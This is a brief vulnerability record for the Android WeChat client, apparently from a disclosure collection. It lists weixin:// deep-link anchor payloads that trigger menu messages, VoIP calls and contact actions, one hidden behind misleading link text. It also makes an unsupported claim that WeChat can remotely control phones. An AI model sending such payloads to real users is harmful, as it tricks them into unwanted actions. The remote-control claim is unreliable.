vendor = "腾讯"
name = "微信发送a链接href可控"
type = "XSS"
version = "安卓版全版本 ios、linux电脑版均不受影响"
path = "weixin://bizmsgmenu weixin://jump/voipdetail/ weixin://voip/callagain/ weixin://findfriend/verifycontact/"
detail = "<a href=\"weixin://bizmsgmenu ?msgmenucontent=我是AdySec的🐶 &msgmenuid=960\">https://chinamobile.com/shell.jsp</a > <a href=\"weixin://jump/voipdetail/?data=1\">点击起飞</a> <a href=\"weixin://voip/callagain/?username=ponyma\">点我和马化腾打电话</a> <a href=\"weixin://findfriend/verifycontact/\">我加我自己</a >"
fix = "1.发送消息后，在/a后加空格，本地仍是无空格可以解析状态，其他人看到的是加了空格的 2.打电话功能不论是否为好友，调用接口打电话直接清除好友关系，如果已经为好友，也会单方面删除好友 3.bizmsgmenu接口修的比较彻底，不管是引用还是批量转发聊天记录，都已经无法使用 4.客户端对链接的解析似乎有了比较明显的变化，证明微信有远程控制用户手机的能力"
date = "0714"
label = "0day"
verifier = "AdySec"
